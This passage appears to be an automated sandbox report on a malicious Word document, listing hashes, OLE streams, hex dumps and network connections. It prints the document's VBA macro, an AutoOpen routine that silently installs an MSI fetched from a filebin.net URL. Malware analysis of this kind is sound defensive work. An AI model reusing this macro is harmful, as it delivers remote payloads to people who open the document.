Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Windows\SysWOW64\expand.exe
File Type:	ASCII text, with CRLF, CR, LF line terminators
Category:	dropped
Size (bytes):	197
Entropy (8bit):	4.736871274845583
Encrypted:	false
SSDEEP:	3:RGXKRjN3MZ9aSLKLbzXDD9jmKXVM8/FAJoDYRJ8LdUeYLIZILDlzsLDIZJ0gEn:zx3MmSLQHtBXVNsReLHHwD0DIZJQn
MD5:	D019A223457D5852577E8F64DC40382C
SHA1:	943B842E5827D4DE79D4AF77C30FFA6300FDD0CD
SHA-256:	170ABE278300A883728C4E5103F593873BA440C32A0828B267C43F1FAEB69CB6
SHA-512:	AB1F7941AEBD538AFBF4C2CCBFAE5306CE886C8B53CC95D1C799E1A71883A17571C0757CD474E22C52323A4F911D4BA1B6D265B638C34B60FC30D75C1492B429
Malicious:	false
Preview:	Microsoft (R) File Expansion Utility..Copyright (c) Microsoft Corporation. All rights reserved.....Adding files\TRY.exe to Extraction Queue....Expanding Files ........Expanding Files Complete .....

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Apr 20 03:06:00 2022, Last Saved Time/Date: Wed Apr 20 03:06:00 2022, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
Entropy (8bit):	6.071377383201628
TrID:	Microsoft Word document (32009/1) 54.23% Microsoft Word document (old ver.) (19008/1) 32.20% Generic OLE2 / Multistream Compound File (8008/1) 13.57%
File name:	12543_0008858249_FWDOUTSTANDING_20200604.doc
File size:	61952
MD5:	090e1dfdcbf2185788ea14cd113cc39f
SHA1:	6346e143368edbb5a23c8eea9698be2c266311b3
SHA256:	3bd5892cdc82dc4576eaf2735edb57182ae8b91c8067be305d4e801197d390cc
SHA512:	d4c9b997909b7bfa87090204a4a97179e61c98c10be73000ec68e32af8feddee19ca8c2bc0e9bf9e3cf040d6e0f4f58f2e0f09eef2936528d1f34c506dbb2e98
SSDEEP:	768:cAuIiy1a9Tq1aBs8jCjuHF7Y89AOEUYqyxrINSrCqxw+tCc27I/:cAFMm1aidiFk89ABrbr1xrt/2
TLSH:	65535CDDF2C2C4BBE12942B5E983C7A6B3BC3E292D1293172574371F3C75924C661269
File Content Preview:	........................>.......................h...........k...............g..................................................................................................................................................................................

File Icon


Icon Hash:	74f4c4c6c1cac4d8

Static OLE Info

General

Document Type:	OLE
Number of OLE Files:	1

OLE File "12543_0008858249_FWDOUTSTANDING_20200604.doc"

Indicators

Has Summary Info:
Application Name:	Microsoft Office Word
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Summary

Code Page:	1252
Title:
Subject:
Author:
Keywords:
Comments:
Template:	Normal.dotm
Last Saved By:
Revion Number:	1
Total Edit Time:	0
Create Time:	2022-04-20 02:06:00
Last Saved Time:	2022-04-20 02:06:00
Number of Pages:	1
Number of Words:	0
Number of Characters:	1
Creating Application:	Microsoft Office Word
Security:	0

Document Summary

Document Code Page:	1252
Number of Lines:	1
Number of Paragraphs:	1
Thumbnail Scaling Desired:	False
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	1048576

Streams with VBA

VBA File Name: ThisDocument.cls, Stream Size: 1773

General
Stream Path:	Macros/VBA/ThisDocument
VBA File Name:	ThisDocument.cls
Stream Size:	1773
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . k . 9 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 1c 03 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff 23 03 00 00 0b 05 00 00 00 00 00 00 01 00 00 00 bf 6b 0f 39 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Dim msi As Object
Set msi = CreateObject("WindowsInstaller.Installer")
msi.UILevel = 2
' the second Property param may require some troubleshooting / testing https://docs.microsoft.com/en-us/windows/win32/msi/action
msi.InstallProduct "https://filebin.net/rf43v6qzghbj7h7b/TRY.msi", ""
End Sub

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	114
Entropy:	4.2359563651
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.229954151382
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T i t l e . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d4 00 00 00 0b 00 00 00 01 00 00 00 60 00 00 00 05 00 00 00 68 00 00 00 06 00 00 00 70 00 00 00 11 00 00 00 78 00 00 00 17 00 00 00 80 00 00 00 0b 00 00 00 88 00 00 00 10 00 00 00 90 00 00 00 13 00 00 00 98 00 00 00 16 00 00 00 a0 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.414636097734
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . . . . . . . 8 . . . . . . . D . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 64 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 bc 00 00 00 06 00 00 00 c8 00 00 00 07 00 00 00 d4 00 00 00 08 00 00 00 e8 00 00 00 09 00 00 00 f4 00 00 00

Stream Path: 1Table, File Type: data, Stream Size: 7133

General
Stream Path:	1Table
File Type:	data
Stream Size:	7133
Entropy:	5.86601132644
Base64 Encoded:	True
Data ASCII:	. . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
Data Raw:	1e 06 0f 00 12 00 01 00 78 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00

Stream Path: Data, File Type: data, Stream Size: 32978

General
Stream Path:	Data
File Type:	data
Stream Size:	32978
Entropy:	7.70790581307
Base64 Encoded:	False
Data ASCII:	. . . . D . d . . . . . . . . . . . . . . . . . . . . . . . G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . C . . . " . . . . A . . . . . . . . . . . . . . . . . . . . . . t . h . a . i . . . . . . . . . . . . . . . b . . . 8 . . . . . . d . . A . . . a , . . m S . ? . . . . . . . . . . D . . . . . . . . n . . . . . . . d . . A . . . a , . . m S . ? . . P N G . . . . . . . . I H D R . . . . . . . . . . . . . . . . . . . . . s R G B
Data Raw:	d2 80 00 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 96 19 47 0e e8 03 e8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 46 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 43 00 0b f0 22 00 00 00 04 41 01 00 00 00 05 c1 0a 00 00 00 06 01 02 00 00 00 ff 01 00 00 08 00 74 00 68 00

Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 367

General
Stream Path:	Macros/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	367
Entropy:	5.30381145663
Base64 Encoded:	True
Data ASCII:	I D = " { 0 6 2 5 E 4 4 A - E 7 6 5 - 4 1 C E - 9 D F D - C 3 4 7 3 6 B 7 5 A 4 6 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C 3 C 1 2 6 B 2 3 E B 6 3 E B 6 3 E B 6 3 E B 6 " . . D P B = " D 7 D 5 3 2 A E 5 2 D 6 6 7 D 7 6 7 D 7 6 7 " . . G C = " E B E 9 0 E D A 2 3 D B 2 3 D B D C " . . . . [ H o s t E x t e n d e r I n f o ]
Data Raw:	49 44 3d 22 7b 30 36 32 35 45 34 34 41 2d 45 37 36 35 2d 34 31 43 45 2d 39 44 46 44 2d 43 33 34 37 33 36 42 37 35 41 34 36 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69

Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 41

General
Stream Path:	Macros/PROJECTwm
File Type:	data
Stream Size:	41
Entropy:	3.07738448508
Base64 Encoded:	False
Data ASCII:	T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
Data Raw:	54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00

Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2435

General
Stream Path:	Macros/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	2435
Entropy:	3.97570851109
Base64 Encoded:	False
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
Data Raw:	cc 61 b5 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 513

General
Stream Path:	Macros/VBA/dir
File Type:	data
Stream Size:	513
Entropy:	6.23760719085
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . u a \\ d . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * , \\ C . . . . r . m . .
Data Raw:	01 fd b1 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 75 61 5c 64 0b 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

Stream Path: WordDocument, File Type: data, Stream Size: 4096

General
Stream Path:	WordDocument
File Type:	data
Stream Size:	4096
Entropy:	1.08065186697
Base64 Encoded:	False
Data ASCII:	. . . . - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j D . D . . . . . . . . . . . . . . . . . . . . . . . . . . . & v S h & v S h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	ec a5 c1 00 2d 00 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 02 08 00 00 0e 00 62 6a 62 6a 44 1c 44 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 26 76 53 68 26 76 53 68 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 20, 2022 09:28:14.619941950 CEST	49742	443	192.168.2.5	185.47.40.36
Apr 20, 2022 09:28:14.619987011 CEST	443	49742	185.47.40.36	192.168.2.5
Apr 20, 2022 09:28:14.620054960 CEST	49742	443	192.168.2.5	185.47.40.36
Apr 20, 2022 09:28:14.624121904 CEST	49742	443	192.168.2.5	185.47.40.36
Apr 20, 2022 09:28:14.624165058 CEST	443	49742	185.47.40.36	192.168.2.5
Apr 20, 2022 09:28:14.726838112 CEST	443	49742	185.47.40.36	192.168.2.5
Apr 20, 2022 09:28:14.726980925 CEST	49742	443	192.168.2.5	185.47.40.36
Apr 20, 2022 09:28:14.752002954 CEST	49742	443	192.168.2.5	185.47.40.36
Apr 20, 2022 09:28:14.752063036 CEST	443	49742	185.47.40.36	192.168.2.5
Apr 20, 2022 09:28:14.752675056 CEST	443	49742	185.47.40.36	192.168.2.5
Apr 20, 2022 09:28:14.802963972 CEST	49742	443	192.168.2.5	185.47.40.36
Apr 20, 2022 09:28:14.974719048 CEST	49742	443	192.168.2.5	185.47.40.36
Apr 20, 2022 09:28:15.018227100 CEST	443	49742	185.47.40.36	192.168.2.5
Apr 20, 2022 09:28:15.033107042 CEST	443	49742	185.47.40.36	192.168.2.5
Apr 20, 2022 09:28:15.033246994 CEST	443	49742	185.47.40.36	192.168.2.5
Apr 20, 2022 09:28:15.033349991 CEST	49742	443	192.168.2.5	185.47.40.36
Apr 20, 2022 09:28:15.033432007 CEST	49742	443	192.168.2.5	185.47.40.36
Apr 20, 2022 09:28:15.033473015 CEST	443	49742	185.47.40.36	192.168.2.5
Apr 20, 2022 09:28:15.033498049 CEST	49742	443	192.168.2.5	185.47.40.36
Apr 20, 2022 09:28:15.033516884 CEST	443	49742	185.47.40.36	192.168.2.5
Apr 20, 2022 09:28:15.100023031 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.100061893 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.100554943 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.100579977 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.100584984 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.325975895 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.326191902 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.328358889 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.328375101 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.328638077 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.331063986 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.374196053 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.379554033 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.425172091 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.425203085 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.425347090 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.425367117 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.425393105 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.425406933 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.425445080 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.425462961 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.425492048 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.425501108 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.426240921 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.471081018 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.471131086 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.471194029 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.471352100 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.471365929 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.471517086 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.471553087 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.471641064 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.471649885 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.471658945 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.471983910 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.472014904 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.472057104 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.472064018 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.472070932 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.472204924 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.518028975 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.518079042 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.518227100 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.518259048 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.518277884 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.518469095 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.518502951 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.518552065 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.518568993 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.518580914 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.518584967 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.518630028 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.518970966 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.519004107 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.519097090 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.519117117 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.519130945 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.519169092 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.519419909 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.519452095 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.519550085 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.519567013 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.519579887 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.519879103 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.519908905 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.519963026 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.519983053 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.519999027 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.520006895 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.520035982 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.520370007 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.520402908 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.520462990 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.520477057 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.520541906 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.520548105 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.520826101 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.520859957 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.521094084 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.521107912 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.521203995 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.566807032 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.566853046 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.566978931 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.567009926 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.567392111 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.567420959 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.567468882 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.567490101 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.567509890 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.567553043 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.567559958 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.567887068 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.567917109 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.568021059 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.568041086 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.568057060 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.568186998 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.568464041 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.568497896 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.568553925 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.568569899 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.568643093 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.568653107 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.568969011 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.569003105 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.569135904 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.569154978 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.569171906 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.569487095 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.569498062 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.569515944 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.569538116 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.569644928 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.569660902 CEST	443	49744	87.238.33.8	192.168.2.5
